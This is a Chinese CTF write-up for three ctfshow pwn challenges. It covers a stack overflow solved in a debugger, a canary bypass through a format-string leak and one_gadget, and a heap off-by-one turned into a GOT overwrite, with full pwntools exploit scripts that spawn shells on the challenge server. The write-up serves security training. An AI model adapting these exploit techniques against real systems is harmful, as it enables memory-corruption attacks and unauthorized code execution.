menu EDS
ctfshow 吃鸡杯 pwn writeup
8377 浏览 | 2021-09-28 | 分类:pwn | 标签:

ctfshow 吃鸡杯 pwn writeup

win_pwn

这道题严格意义来说是一道逆向题。
main()存在栈溢出

int __cdecl main(int argc, const char **argv, const char **envp)
{
 int result; // eax
 char v4; // [esp+16h] [ebp-AAh]
 char v5; // [esp+BFh] [ebp-1h]

 __main();
 v5 = 1;
 puts("Please input your name:");
 fflush(&__iob[1]);
 scanf("%s", &v4);
 if ( v5 )
  result = printf("Your level is not admin");
 else
  result = DangerFunc(&v4);
 if ( argc != 1 )
  exit(0);
 return result;
}

如果v5里边有内容,则退出。程序在开始时v5=1,所以必须通过溢出覆盖掉v5才能执行DangerFunc()函数。

int __cdecl DangerFunc(char *a1)
{
 int v2; // [esp+18h] [ebp-30h]

 getflag(a1, (int)&v2);
 puts("###########################################################################");
 puts("###########################################################################");
 printf("\t\tflag{%s}\t\t\t\n", &v2);
 puts("###########################################################################");
 puts("###########################################################################");
 fflush(&__iob[1]);
 return system("c:\\Windows\\System32\\cmd.exe");
}

DangerFunc()内的getflag()要求其第一个参数内的前168位不能为0。

int __cdecl getflag(char *a1, int a2)
{
 size_t v2; // eax
 int v3; // eax
 int result; // eax
 int v5; // [esp+10h] [ebp-88h]
 char v6; // [esp+68h] [ebp-30h]
 char v7[32]; // [esp+6Ch] [ebp-2Ch]
 int i; // [esp+8Ch] [ebp-Ch]

 for ( i = 0; i <= 168; ++i )
 {
  if ( !a1[i] )
  {
   puts("Do not input '\\0'!");
   exit(0);
  }
 }
 v2 = strlen(a1);
 itoa(v2 + 16, &v6, 10);
 MD5Init(&v5);
 v3 = strlen(&v6);
 MD5Update((int)&v5, &v6, v3);
 result = MD5Final(&v5, v7);
 for ( i = 0; i <= 15; ++i )
  result = sprintf((char *)(2 * i + a2), "%02x", (unsigned __int8)v7[i]);
 return result;
}

所以该题解题方法为输入大量的垃圾字符,在0x0402473处下断点,将esp+0xBF内的内容改为0即可获得flag。

easy_canary

main()函数里面的rand()的seed固定是0,所以其生成的随机数也是固定的,达成条件后进入something。

int __cdecl main(int argc, const char **argv, const char **envp)
{
 int v4; // [rsp+4h] [rbp-Ch]
 unsigned int seed; // [rsp+8h] [rbp-8h]
 int v6; // [rsp+Ch] [rbp-4h]

 menu(*&argc, argv, envp);
 seed = 0;
 v4 = 0;
 srand(0);
 v6 = 0;
 puts("input your lucky number:");
 gets(&v4);
 v6 = rand();
 if ( v4 == v6 )
 {
  while ( seed <= 1 )
  {
   something();
   putchar(10);
   ++seed;
  }
 }
 return 0;
}

something()函数存在栈溢出和格式化字符串漏洞。

__int64 something()
{
 char buf; // [rsp+0h] [rbp-50h]
 unsigned __int64 v2; // [rsp+48h] [rbp-8h]

 v2 = __readfsqword(0x28u);
 memset(&buf, 0, 0x40uLL);
 read(0, &buf, 0x68uLL);
 printf(&buf, &buf);
 return 0LL;
}

但是存在canary保护,所以需要泄露canary和libc,由于溢出只有两个地址的位置,但执行完ret时rax为0,所以有合适的one_gadget可以直接进行跳转。

#!/usr/bin/env python
# coding=utf-8
from pwn import *
context.arch = 'amd64'

local = 0
if local == 1:
  r=process('./pwn1')
  gdb.attach(r,"b * $rebase(0xB0D)")
  libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
  lsmr = 0x020840
  ogg = 0x45226
else:
  r = remote('pwn.challenge.ctf.show',28029)
  libc = ELF('./libc_64.so')
  lsmr = 0x020830
  ogg = 0x45216
elf=ELF('./pwn1')

r.recvuntil('number:')
r.sendline(p32(0x6b8b4567)+'\x00'*4+cyclic(4)+'\x00'*7)
sleep(1)
r.sendline('%21$p%25$p%15$p')
r.recvuntil('\n')

libc_addr = int(r.recv(14),16)-lsmr
pie = int(r.recv(14),16)-elf.symbols['main']
canary = int(r.recv(18),16)

log.success('libc_addr:'+hex(libc_addr))
log.success('pie:'+hex(pie))
log.success('canary:'+hex(canary))

r.sendline(cyclic(72)+p64(canary)+p64(0xdeadbeef)+p64(libc_addr+ogg))

r.interactive()

ezheap

查看menu()函数存在如下功能。

int menu()
{
 puts("--------------------------------");
 puts("    w0odpeck3r's Nest    ");
 puts("--------------------------------");
 puts(" 1. Build a Nest        ");
 puts(" 2. Decorate a Nest       ");
 puts(" 3. Show a Nest         ");
 puts(" 4. Crash a Nest        ");
 puts(" 5. Leave the tree       ");
 puts("--------------------------------");
 return printf("Your choice :");
}

buildnest()函数为先生成一个0x10的堆块,输入大小,再生成一个指定大小的堆块。并将大小和堆地址存入最开始的堆块内。

unsigned __int64 buildnest()
{
 _QWORD *v0; // rbx
 signed int i; // [rsp+4h] [rbp-2Ch]
 size_t size; // [rsp+8h] [rbp-28h]
 char buf; // [rsp+10h] [rbp-20h]
 unsigned __int64 v5; // [rsp+18h] [rbp-18h]

 v5 = __readfsqword(0x28u);
 for ( i = 0; i <= 9; ++i )
 {
  if ( !nests[i] )
  {
   nests[i] = malloc(0x10uLL);
   if ( !nests[i] )
   {
    puts("Nope.something wrong..");
    exit(1);
   }
   printf("how big is the nest ?");
   read(0, &buf, 8uLL);
   size = atoi(&buf);
   v0 = nests[i];
   v0[1] = malloc(size);
   if ( !*(nests[i] + 1) )
   {
    puts("Nope.something wrong..");
    exit(2);
   }
   *nests[i] = size;
   printf("what stuff you wanna put in the nest?", &buf);
   myread(*(nests[i] + 1), size);
   puts("Thx buddy.");
   return __readfsqword(0x28u) ^ v5;
  }
 }
 return __readfsqword(0x28u) ^ v5;
}

decoratenest()函数存在off by one

unsigned __int64 decoratenest()
{
 int v1; // [rsp+Ch] [rbp-14h]
 char buf; // [rsp+10h] [rbp-10h]
 unsigned __int64 v3; // [rsp+18h] [rbp-8h]

 v3 = __readfsqword(0x28u);
 printf("Index :");
 read(0, &buf, 4uLL);
 v1 = atoi(&buf);
 if ( v1 < 0 || v1 > 9 )
 {
  puts("OOB!My Boy!");
  _exit(0);
 }
 if ( nests[v1] )
 {
  printf("what stuff you wanna put in the nest?", &buf);
  myread(*(nests[v1] + 1), *nests[v1] + 1LL);
  puts("Done !");
 }
 else
 {
  puts("No such nest !");
 }
 return __readfsqword(0x28u) ^ v3;
}

shownext()函数输出指定堆块的第二个地址。

unsigned __int64 shownest()
{
 int v1; // [rsp+Ch] [rbp-14h]
 char buf; // [rsp+10h] [rbp-10h]
 unsigned __int64 v3; // [rsp+18h] [rbp-8h]

 v3 = __readfsqword(0x28u);
 printf("Index :");
 read(0, &buf, 4uLL);
 v1 = atoi(&buf);
 if ( v1 < 0 || v1 > 9 )
 {
  puts("OOB!My Boy!");
  _exit(0);
 }
 if ( nests[v1] )
 {
  printf("Size : %ld\nDecorations : %s\n", *nests[v1], *(nests[v1] + 1));
  puts("Done !");
 }
 else
 {
  puts("No such nest !");
 }
 return __readfsqword(0x28u) ^ v3;
}

crash_nest()为先释放指定堆块的第二个地址,然后释放该堆块。

unsigned __int64 crash_nest()
{
 int v1; // [rsp+Ch] [rbp-14h]
 char buf; // [rsp+10h] [rbp-10h]
 unsigned __int64 v3; // [rsp+18h] [rbp-8h]

 v3 = __readfsqword(0x28u);
 printf("Index :");
 read(0, &buf, 4uLL);
 v1 = atoi(&buf);
 if ( v1 < 0 || v1 > 9 )
 {
  puts("OOB!My Boy!");
  _exit(0);
 }
 if ( nests[v1] )
 {
  free(*(nests[v1] + 1));
  free(nests[v1]);
  nests[v1] = 0LL;
  puts("Now another w0odpeck3r lost his house :(");
 }
 else
 {
  puts("No such nest !");
 }
 return __readfsqword(0x28u) ^ v3;
}

先申请三次,总共有6个堆块。利用off by one修改第0个堆块。溢出修改第1个堆块大小为0x41,然后释放掉第1个那两个堆块。再申请0x38大小的堆块,这样就重复获得刚才的两个堆块。并出现堆块重叠,利用uaf修改堆指针为free_got,泄露free()的真实地址并修改为system()的地址。getshell。

#!/usr/bin/env python
# coding=utf-8
from pwn import *
context.arch = 'amd64'


local = 0
if local == 1:
  r=process('./ezheap')
  gdb.attach(r,"b * menu")
  libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
else:
  r = remote('pwn.challenge.ctf.show',28081)
  libc = ELF('libc-2.27.so')

elf=ELF('./ezheap')

def add(size,content):
  r.recvuntil('choice :')
  r.sendline('1')
  r.recvuntil('nest ?')
  r.sendline(str(size))
  r.recvuntil('nest?')
  r.send(str(content))

def write(index,content):
  r.recvuntil('choice :')
  r.sendline('2')
  r.recvuntil('Index :')
  r.sendline(str(index))
  r.recvuntil('nest?')
  r.send(str(content))

def dele(index):
  r.recvuntil('choice :')
  r.sendline('4')
  r.recvuntil('Index :')
  r.sendline(str(index))

def show(index):
  r.recvuntil('choice :')
  r.sendline('3')
  r.recvuntil('Index :')
  r.sendline(str(index))

add(0x18,'a'*0x18)
add(0x18,'b'*0x8)
add(0x48,'c'*0x8)
add(0x48,'d'*0x8)

write(0,'e'*0x18+'\x41')
dele(1)
add(0x38,'f'*0x18+p64(0x21)+p64(0x880)+'\xe0')

write(1,p64(0x88)+p64(elf.got['free']))
show(2)
r.recvuntil('Decorations : ')
free = u64(r.recv(6)+'\x00\x00')
log.success('free:'+hex(free))

libc_addr = free - libc.symbols['free']
system = libc_addr + libc.symbols['system']
write(2,p64(system))

write(1,'/bin/sh\x00')
dele(1)

r.interactive()

发表评论

email
web

全部评论 (暂无评论)

info 还没有任何评论,你来说两句呐!